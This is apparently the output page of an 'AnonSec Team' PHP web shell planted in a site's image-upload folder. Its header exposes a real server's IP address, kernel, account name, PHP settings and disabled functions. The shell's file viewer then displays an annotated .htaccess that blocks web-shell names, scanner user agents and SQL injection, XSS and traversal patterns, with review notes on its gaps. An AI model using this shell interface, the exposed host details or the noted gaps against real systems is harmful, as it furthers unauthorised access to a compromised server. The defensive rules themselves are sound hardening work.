AnonSec Team
Server IP : 124.109.2.77  /  Your IP : 216.73.216.49
Web Server : Apache/2
System : Linux ns4.amiprocorp.com 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : cpctlp ( 1020)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON  |  cURL : ON  |  WGET :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/wget) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 329
OFF  |  Perl :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/perl) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 335
OFF  |  Python :
Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/python2) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 341
OFF
Directory (0755) :  /home/cpctlp/domains/cpctlphp.com/public_html/admin/../fonts/../css/../js/../


Current File : /home/cpctlp/domains/cpctlphp.com/public_html/admin/../fonts/../css/../js/../.htaccess-
# Optimized .htaccess for CKEditor 4.10.1 compatibility
# NOTE(review): Apache only reads per-directory overrides from the file name
# configured by AccessFileName (".htaccess" by default). If this content is
# stored under any other name, none of the directives below are in effect.
# Confirm the deployed file name before relying on these rules.
# Basic security settings
# Disable auto-generated directory listings for this directory tree.
Options -Indexes
 

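# Protect .htaccess file
# Deny direct HTTP access to this file. Both authorization syntaxes are given:
# Apache 2.4 (mod_authz_core) uses Require; the Order/Deny form is kept only
# for servers without mod_authz_core, because on 2.4 it needs mod_access_compat.
<Files ".htaccess">
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
    </IfModule>
</Files>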

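# Protect files starting with dot (except well-known files)
# FilesMatch tests the final file name only. This hides dotfiles themselves,
# but not ordinary files stored inside a dot-directory.
# Written for both Apache 2.4 (Require) and legacy 2.2 (Order/Deny).
<FilesMatch "^\.(?!well-known)">
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
    </IfModule>
</FilesMatch>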

# Request filtering with mod_rewrite.
# Rules are evaluated top to bottom. "-" means no substitution, [L] stops rule
# processing for the request, and [F] answers 403 Forbidden.
# These rules are pattern filters on the URI, method, User-Agent and query
# string. They reduce noise but do not replace input validation in the
# application or disabling script execution in upload directories.
<IfModule mod_rewrite.c>
RewriteEngine On

# Allow CKEditor essential files and directories
# Every request under /ckeditor/ stops here, so none of the deny rules below
# (method, User-Agent, query string) are applied to those requests.
RewriteCond %{REQUEST_URI} ^/ckeditor/ [NC]
RewriteRule ^ckeditor/.*$ - [L]

# Allow common web assets for CKEditor
# The condition tests only the URI suffix and is not limited to /ckeditor/, so
# it applies site-wide. Because of [L], every deny rule below is skipped for
# any request whose URI ends in one of these extensions.
# NOTE(review): consider placing the deny rules before the allow rules, or
# restricting this rule to the CKEditor path, so the allow-list cannot
# short-circuit the filters.
RewriteCond %{REQUEST_URI} \.(js|css|png|jpg|jpeg|gif|svg|ico|woff|woff2|ttf|eot|json)$ [NC]
RewriteRule ^.*$ - [L]

# Protection against specific malware and shells
# Case-insensitive substring match, so any URI containing "alfa" is refused.
# This is a name blocklist: it only covers files that keep a known name.
RewriteCond %{REQUEST_URI} (ALFA_DATA|alfa|ALFA|alfacgiapi|alfaex) [NC]
RewriteRule .* - [F,L]

# Block dangerous shell files
# Same limitation as above: it matches well-known names only, and a file saved
# under an arbitrary name is unaffected. The terms are unanchored substrings,
# so legitimate URLs containing them are also refused.
RewriteCond %{REQUEST_URI} (shell|backdoor|webshell|c99|r57|wso|adminer|bypass|hack|exploit|malware) [NC]
RewriteCond %{REQUEST_URI} !^/ckeditor/ [NC]
RewriteRule .* - [F,L]

# Block dangerous directories (but allow CKEditor)
# Unanchored: "views" also matches paths such as /reviews/ and "logs" matches
# /blogs/. NOTE(review): anchor on path segments if only directories are meant.
RewriteCond %{REQUEST_URI} (views|cache|shell|hack|bypass|logs) [NC]
RewriteCond %{REQUEST_URI} !^/ckeditor/ [NC]
RewriteRule .* - [F,L]

# Block dangerous file extensions (refined list)
# ".php" itself is not in this list, so the rule does not stop a .php file
# placed in a writable upload directory from being served through the PHP
# handler. NOTE(review): deny script handling in upload/image directories at
# the vhost or directory level instead of relying on an extension blocklist.
RewriteCond %{REQUEST_URI} \.(phtml|php3|php4|php5|php7|phps|pl|py|cgi|sh|exe|bat|com|cmd|scr|vbs|jar|asp|aspx|jsp|cfm|rb|go|sql|db|bak|old|tmp|temp|orig)$ [NC]
RewriteCond %{REQUEST_URI} !^/ckeditor/ [NC]
RewriteRule .* - [F,L]

# Block dangerous HTTP methods
# Refuses the listed methods; any method not listed is unaffected.
RewriteCond %{REQUEST_METHOD} ^(PUT|DELETE|TRACE|CONNECT|PATCH)$ [NC]
RewriteRule .* - [F,L]

# Block suspicious User-Agents (refined)
# Refuses an empty User-Agent or one containing a listed tool name. The header
# is client-supplied, so this is traffic hygiene rather than access control.
RewriteCond %{HTTP_USER_AGENT} ^$ [OR]
RewriteCond %{HTTP_USER_AGENT} (wget|curl|libwww|python|nikto|scan|acunetix|netsparker|sqlmap|nmap|masscan|zmap|zgrab|shodan|censys) [NC]
RewriteRule .* - [F,L]

# Block common attack patterns
# Only the query string is inspected; request bodies, cookies and other
# headers are not. Parameterized queries in the application remain the control
# for SQL injection.
RewriteCond %{QUERY_STRING} (union.*select|insert.*into|delete.*from|drop.*table|create.*table|alter.*table) [NC]
RewriteRule .* - [F,L]

# Block XSS attempts
# NOTE(review): %{QUERY_STRING} is compared as received, not URL-decoded, so
# only the literal forms listed here are matched. Verify against the Apache
# version in use, and keep output encoding in the application as the primary
# control.
RewriteCond %{QUERY_STRING} (<script|<object|javascript:|vbscript:|onload=|onerror=) [NC]
RewriteRule .* - [F,L]

# Block file inclusion attempts
# Matches "../" and "..\" and the variants where only the slash or backslash
# is percent-encoded, in the query string only.
RewriteCond %{QUERY_STRING} (\.\.\/|\.\.\\|\.\.\%2f|\.\.\%5c) [NC]
RewriteRule .* - [F,L]

</IfModule>

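# Security Headers
# Response headers that tighten how browsers handle content served from this
# tree. "always" also applies them to error responses.
<IfModule mod_headers.c>
    # Stop browsers from guessing a content type other than the declared one.
    Header always set X-Content-Type-Options nosniff
    # Legacy framing control. The CSP frame-ancestors directive below states
    # the same policy in the standards-based form.
    Header always set X-Frame-Options DENY
    # Legacy header for browsers that still ship an XSS auditor; current
    # browsers ignore it. It does not replace output encoding or the CSP.
    Header always set X-XSS-Protection "1; mode=block"
    # Send the full referrer to same-origin requests, only the origin cross-site.
    Header always set Referrer-Policy "strict-origin-when-cross-origin"
    # Deny these browser features to this site and anything it embeds.
    Header always set Permissions-Policy "geolocation=(), microphone=(), camera=()"

    # Allow CKEditor to work properly
    # 'unsafe-inline' and 'unsafe-eval' in script-src mean this policy does not
    # stop injected inline script; it mainly limits where resources load from.
    # NOTE(review): confirm which of the two CKEditor 4.10.1 needs on this
    # site, and scope the relaxed policy to the editor pages if possible.
    # frame-ancestors 'none' mirrors X-Frame-Options DENY for CSP-aware browsers.
    Header always set Content-Security-Policy "default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: blob:; font-src 'self' data:; connect-src 'self'; media-src 'self'; object-src 'none'; child-src 'self'; frame-src 'self'; worker-src 'self'; manifest-src 'self'; frame-ancestors 'none';"
</IfModule>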

# Compression for better performance
# Enables the DEFLATE output filter for text-like response types.
# NOTE(review): compressing HTTPS responses that contain both secrets and
# request-influenced content is the precondition for compression side
# channels. Check that pages carrying tokens do not reflect request input.
<IfModule mod_deflate.c>
    # Plain text and markup
    AddOutputFilterByType DEFLATE text/plain text/html text/xml text/css
    # XML-based application formats
    AddOutputFilterByType DEFLATE application/xml application/xhtml+xml application/rss+xml
    # Script and data formats
    AddOutputFilterByType DEFLATE application/javascript application/x-javascript application/json
</IfModule>

# Cache control for CKEditor assets
# Sets a one-month client cache lifetime, counted from the time of access, for
# static asset types. The rules key on content type, not on path, so they
# apply to every matching response in this tree and not only to CKEditor.
<IfModule mod_expires.c>
    ExpiresActive On

    # Stylesheets and scripts
    ExpiresByType application/javascript "access plus 1 month"
    ExpiresByType text/css "access plus 1 month"

    # Images (image/jpg is not a registered type name; kept as in the original)
    ExpiresByType image/gif "access plus 1 month"
    ExpiresByType image/jpeg "access plus 1 month"
    ExpiresByType image/jpg "access plus 1 month"
    ExpiresByType image/png "access plus 1 month"
    ExpiresByType image/svg+xml "access plus 1 month"

    # Web fonts, under both the font/* and the older application/* names
    ExpiresByType font/woff "access plus 1 month"
    ExpiresByType font/woff2 "access plus 1 month"
    ExpiresByType application/font-woff "access plus 1 month"
    ExpiresByType application/font-woff2 "access plus 1 month"
</IfModule>

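# Protect specific sensitive files
# Refuses any file whose name ends in one of these extensions (configuration,
# logs, dumps, backups). The match is on the file name suffix only.
# Written for both Apache 2.4 (Require) and legacy 2.2 (Order/Deny).
<Files ~ "\.(htaccess|htpasswd|ini|log|sh|inc|bak|orig|tmp|temp|sql|db|conf|config)$">
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
    </IfModule>
</Files>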

# Block directory browsing
# Repeats the "Options -Indexes" set at the top of this file, here applied only
# when mod_autoindex (the module that generates listings) is loaded.
<IfModule mod_autoindex.c>
    Options -Indexes
</IfModule>

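# Prevent access to version control files
# FilesMatch tests only the final file name, so it covers entries such as
# ".gitignore" but not files stored inside a ".git/" (or .svn/.hg/.bzr)
# directory, whose own names contain no such marker. The RedirectMatch below
# closes that gap by matching on the URL path.
<FilesMatch "\.(git|svn|hg|bzr)">
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
    </IfModule>
</FilesMatch>

# Answer 404 for anything at or below a version-control metadata directory.
<IfModule mod_alias.c>
    RedirectMatch 404 "/\.(git|svn|hg|bzr)(/|$)"
</IfModule>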

# Additional protection for WordPress if used
# Refuses requests under /wp-admin/ unless they target admin-ajax.php or
# admin-post.php, or come from an allowed client address.
# This block has no RewriteEngine directive of its own; it relies on the
# "RewriteEngine On" set earlier in this file. Its rule is also skipped for any
# request that an earlier [L] allow rule has already matched.
<IfModule mod_rewrite.c>
    RewriteCond %{REQUEST_URI} ^/wp-admin/ [NC]
    RewriteCond %{REQUEST_URI} !^/wp-admin/admin-ajax\.php [NC]
    RewriteCond %{REQUEST_URI} !^/wp-admin/admin-post\.php [NC]
    RewriteCond %{REMOTE_ADDR} !^127\.0\.0\.1$
    # NOTE(review): YOUR_IP_ADDRESS is an unreplaced template placeholder.
    # As written this condition is true for every client, so only 127.0.0.1
    # passes. Replace it with the administrator address as an escaped regex,
    # or remove the block if WordPress is not installed.
    RewriteCond %{REMOTE_ADDR} !^YOUR_IP_ADDRESS$
    RewriteRule ^.*$ - [F,L]
</IfModule>
